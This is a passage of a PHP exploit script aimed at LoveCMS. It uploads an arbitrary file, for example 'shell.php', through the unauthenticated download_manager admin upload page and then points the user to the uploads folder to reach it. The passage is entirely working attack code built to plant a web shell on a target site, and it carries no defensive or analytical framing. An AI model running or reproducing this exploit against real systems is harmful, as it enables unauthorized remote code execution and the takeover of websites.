\n", $argv[0]); printf("[~] Ex.: php %s localhost/lovecms shell.php\n\n", $argv[0]); exit; } list($script, $target, $file) = $argv; $xpl = curl_init(); curl_setopt($xpl, CURLOPT_URL, $target . '/modules/download_manager/admin/index.php'); curl_setopt($xpl, CURLOPT_RETURNTRANSFER, true); curl_setopt($xpl, CURLOPT_POST, true); curl_setopt($xpl, CURLOPT_POSTFIELDS, array('file' => '@' . $file, 'submit' => 'Upload')); curl_exec($xpl); curl_close($xpl); printf("[!] Go to the %s/uploads/ and check U'r file :)\n\n", $target); ?>